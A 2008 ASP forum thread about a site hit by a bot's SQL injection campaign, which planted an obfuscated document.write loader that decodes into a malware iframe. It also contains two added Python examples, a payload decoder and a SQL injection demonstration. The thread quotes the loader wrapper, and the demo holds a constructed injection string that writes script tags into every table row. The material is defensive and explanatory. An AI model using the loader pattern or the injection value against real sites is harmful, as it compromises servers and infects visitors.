new type of injection? rewrite default document?

Discussion in 'ASP General' started by Brian Bozarth, Jul 11, 2008.

  1. This is weird, I'm pretty familiar with SQL Injection - but we're getting
    these weird injections that are writing into the default document or home page.
    What it's doing is putting in script code at the top or bottom of the home
    page... it looks something like this:

    <script>function xy1q4877d47d91a36(q4877d47d92209){ function q4877d47d929d5
    () {return 16;} return (parseInt(q4877d47d92209,q4877d47d929d5()));}function
    q4877d47d93974(q4877d47d94144){ var q4877d47d95c9b=2; var
    q4877d47d94d7f='';q4877d47d96c3a=String.fromCharCode;for(q4877d47d954cc=0;q4877d47d954cc<q4877d47d94144.length;q4877d47d954cc+=q4877d47d95c9b){
    q4877d47d94d7f+=(q4877d47d96c3a(xy1q4877d47d91a36(q4877d47d94144.substr(q4877d47d954cc,q4877d47d95c9b))));}return
    q4877d47d94d7f;} var
    q4877d47d9740a='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';document.write(q4877d47d93974(q4877d47d9740a));</script>

    What it's doing is decoding itself into an iframe that links out to popups
    that will try and download a virus on your machine. I don't get the popup
    on my machine because I think I have a newer version of IE. But some
    people have complained that it is installing a virus on their machine.

    Also, what is crazy is that when I replace the file with a good version, in
    about 30 mins it is automatically overwritten with the infected version.
    Also I've noticed it on some other websites that I haven't touched.

    Has anyone encountered this before? Because I'm stumped as to the cause of
    it. I don't see the issue on our dev server. It seems to be IIS on a
    shared host.

    Brian
     
    Brian Bozarth, Jul 11, 2008
    #1
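    For anyone triaging a page like this, the script above is only a thin wrapper: it walks a hex string two digits at a time, runs parseInt(..., 16) on each pair and joins the characters with String.fromCharCode, then document.write()s the result. The following Python is an added example (not code from the thread or from any poster) that reproduces that decoding step so the hidden iframe can be read without letting a browser execute it. The infected page and its hex payload are constructed here; the payload encodes an iframe pointing at a placeholder host (malware.example.invalid), not the real string from the post, which is not reproduced.

```python
import re

# Constructed sample of an infected home page, in the shape of the script quoted
# in the post. The hex blob is our own: it encodes a hidden iframe aimed at a
# placeholder host, not the real payload from the thread.
DECODED_SAMPLE = '<iframe src="http://malware.example.invalid/" width="0" height="0"></iframe>'
SAMPLE_HEX = DECODED_SAMPLE.encode("ascii").hex()
INFECTED_PAGE = (
    "<html><body><h1>Welcome</h1>"
    "<script>function a(s){function b(){return 16;}return parseInt(s,b());}"
    "function c(h){var w=2;var o='';f=String.fromCharCode;for(i=0;i<h.length;i+=w){"
    "o+=(f(a(h.substr(i,w))));}return o;} var p='" + SAMPLE_HEX + "';"
    "document.write(c(p));</script></body></html>"
)

# A long hex literal assigned to a variable and immediately document.write'd is the
# signature of this obfuscation; the regex tolerates the line breaks seen in the post.
HEX_LITERAL = re.compile(r"var\s+\w+\s*=\s*'([0-9a-fA-F]{20,})'\s*;\s*document\.write")


def decode_hex_pairs(payload: str, width: int = 2) -> str:
    """Mirror of the script's own loop: `width` hex digits at a time, parseInt(..., 16)
    each chunk and turn the number into a character."""
    return "".join(chr(int(payload[i:i + width], 16)) for i in range(0, len(payload), width))


def find_injected_payloads(html: str) -> list:
    """Return (hex_literal, decoded_text) for every document.write'd hex blob in the page."""
    return [(m.group(1), decode_hex_pairs(m.group(1))) for m in HEX_LITERAL.finditer(html)]


def iframe_targets(html: str) -> list:
    """The URLs the decoded payloads would load, i.e. what to block and report."""
    targets = []
    for _, decoded in find_injected_payloads(html):
        targets += re.findall(r'<iframe[^>]*\ssrc=["\']([^"\']+)', decoded, flags=re.I)
    return targets


if __name__ == "__main__":
    for hexblob, decoded in find_injected_payloads(INFECTED_PAGE):
        print("hex payload length:", len(hexblob))
        print("decoded:", decoded)
    print("iframe targets:", iframe_targets(INFECTED_PAGE))
```

    Run it against a saved copy of the defaced page (read the file into a string and pass it to iframe_targets) to get the destination hosts for firewall rules and for the abuse report; the decoding is done in Python so nothing from the page is executed.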

  2. It would seem you have a virus on your machine that is adding the code.

    This is just a thought, I don't know if it will work, but try auditing access
    to the file. Maybe then you can at least see what user the virus is running
    under. Look in your task manager for processes running.

    "Brian Bozarth" <> wrote in message
    news:...
    > This is weird, I'm pretty familiar with SQL Injection - but we're getting
    > these weird injection that is writing in the default document or home
    > page. What it's doing is putting in script code at the top or bottom of
    > the home page... it looks something like this:
    >
    > <script>function xy1q4877d47d91a36(q4877d47d92209){ function
    > q4877d47d929d5 () {return 16;} return
    > (parseInt(q4877d47d92209,q4877d47d929d5()));}function
    > q4877d47d93974(q4877d47d94144){ var q4877d47d95c9b=2; var
    > q4877d47d94d7f='';q4877d47d96c3a=String.fromCharCode;for(q4877d47d954cc=0;q4877d47d954cc<q4877d47d94144.length;q4877d47d954cc+=q4877d47d95c9b){
    > q4877d47d94d7f+=(q4877d47d96c3a(xy1q4877d47d91a36(q4877d47d94144.substr(q4877d47d954cc,q4877d47d95c9b))));}return
    > q4877d47d94d7f;} var
    > q4877d47d9740a='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';document.write(q4877d47d93974(q4877d47d9740a));</script>
    >
    > What it's doing is decoding itself into an iframe that links out to popups
    > that will try and download a virus on your machine. I don't get the
    > popup in my machine because i think i have a newer version of IE. But
    > some people have complained that it is installing a virus on their
    > machine.
    >
    > Also what is crazy is when I replace the file with a good version. In
    > about 30 mins, it automatically overwritten with the infected version.
    > Also I've noticed it on some other websites that I haven't touched.
    >
    > Has anyone encountered this before? Because I'm stumped as to the cause
    > of it. I don't see the issue on our dev server. It seems to be IIS on
    > a shared host.
    >
    > Brian
    >
     
    ThatsIT.net.au, Jul 13, 2008
    #2

  3. Brian Bozarth wrote:
    > This is weird, I'm pretty familiar with SQL Injection - but we're
    > getting these weird injection that is writing in the default document or
    > home
    > page. What it's doing is putting in script code at the top or bottom of
    > the
    > home page... it looks something like this:
    >

    Browse through the several threads about sql injection that have been posted
    in the last couple weeks. You should find posts that mention these links:

    http://www.aspmessageboard.com/forum/showMessage.asp?F=21&M=894997&P=1#894984
    http://isc.sans.org/diary.html?n&storyid=4294
    http://blogs.technet.com/neilcar/ar...-of-a-sql-injection-incident-part-2-meat.aspx

    In a nutshell, you've been attacked by a bot that uses google to find sites
    that might be vulnerable to sql injection, based on the use of querystrings
    in the urls. It then runs through a scripted routine to find the
    vulnerabilities in the sites, and if they exist, uses those vulnerabilities
    to insert those script tags you are seeing into every table in your
    database. Since your code is likely to be writing data retrieved from the
    database to Response without validating or encoding it, it's really your
    code that is inserting the script tags into your pages.

    So the first thing you should do is check the data in your database. If
    corrupt, take it offline and restore a backup, or run a stored procedure
    which was posted by Old Pedant to attempt to cleanse it. Then, go through
    your server-side code with a fine-tooth comb and

    1. Make your code impervious to sql injection by eliminating all use of
    dynamic sql, using parameters instead.
    See here for a better, more secure way to execute your queries by using
    parameter markers:
    http://groups-beta.google.com/group/microsoft.public.inetserver.asp.db/msg/72e36562fee7804e

    Personally, I prefer using stored procedures, or saved parameter queries as
    they are known in Access:

    Access:
    http://www.google.com/groups?hl=en&lr=&ie=UTF-8&oe=UTF-8&selm=

    http://groups.google.com/groups?hl=...=1&selm=


    SQL Server:

    http://groups.google.com/group/microsoft.public.inetserver.asp.general/msg/5d3c9d4409dc1701?hl=en&


    2. Use Server.HTMLEncode when writing data to Response



    --
    Microsoft MVP - ASP/ASP.NET
    Please reply to the newsgroup. This email account is my spam trap so I
    don't check it very often. If you must reply off-line, then remove the
    "NO SPAM"
     
    Bob Barrows [MVP], Jul 13, 2008
    #3
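    To make Bob's two steps concrete, here is an added example (not code from this thread or from any poster, and not Classic ASP) written in Python with an in-memory sqlite3 table standing in for the site's SQL Server database. It shows the same request value going through a string-concatenated query, where the appended UPDATE runs and tags every row with a script tag, and through a query with a parameter marker, where the value is just an id that matches nothing; then it shows html.escape doing what Server.HTMLEncode does before Response.Write. The table, the hostile value and the marker script tag are all constructed for the example.

```python
import html
import sqlite3

# Constructed stand-in for the site's database: one table a Classic ASP page might
# read with "SELECT ... WHERE id = '" & Request.QueryString("id") & "'".
def fresh_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript(
        "CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT, blurb TEXT);"
        "INSERT INTO products(name, blurb) VALUES ('Widget', 'A fine widget.');"
        "INSERT INTO products(name, blurb) VALUES ('Gadget', 'A better gadget.');"
    )
    return con


# Constructed hostile querystring value, shaped like the bot's technique Bob describes:
# close the string literal and append a statement that tacks a script tag onto every row.
# The tag is an inert marker, not the real payload quoted in the thread.
HOSTILE_ID = "1'; UPDATE products SET blurb = blurb || '<script>marker()</script>' WHERE '1'='1"

SCRIPT_ROWS = "SELECT COUNT(*) FROM products WHERE blurb LIKE '%<script>%'"


def lookup_dynamic_sql(con: sqlite3.Connection, product_id: str) -> int:
    """The 'before': the request value is pasted into the SQL text. executescript() is
    used because, like ADO talking to SQL Server, it runs the whole batch; sqlite3's
    execute() would refuse the second statement. Returns how many rows now carry a
    script tag."""
    sql = "SELECT blurb FROM products WHERE id = '" + product_id + "'"
    con.executescript(sql)  # the appended UPDATE runs here
    return con.execute(SCRIPT_ROWS).fetchone()[0]


def lookup_parameterized(con: sqlite3.Connection, product_id: str) -> list:
    """Bob's step 1: a parameter marker. The driver sends the value as data, so the
    hostile string is just an id that matches nothing and no second statement exists."""
    rows = con.execute("SELECT blurb FROM products WHERE id = ?", (product_id,)).fetchall()
    return [r[0] for r in rows]


def script_row_count(con: sqlite3.Connection) -> int:
    return con.execute(SCRIPT_ROWS).fetchone()[0]


def render_blurb(blurb: str) -> str:
    """Bob's step 2: the equivalent of Server.HTMLEncode before Response.Write, so a
    stored <script> tag reaches the browser as text rather than as markup."""
    return "<p>" + html.escape(blurb, quote=True) + "</p>"


if __name__ == "__main__":
    con = fresh_db()
    print("rows tagged after dynamic SQL:", lookup_dynamic_sql(con, HOSTILE_ID))
    con = fresh_db()
    print("parameterized lookup returns:", lookup_parameterized(con, HOSTILE_ID),
          "| rows tagged:", script_row_count(con))
    print(render_blurb("A fine widget.<script>marker()</script>"))
```

    The order matters: encoding output stops the stored tags from running in visitors' browsers, but only the parameterized query stops the bot from writing them into the tables in the first place, which is why the page keeps coming back infected after the file is restored.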
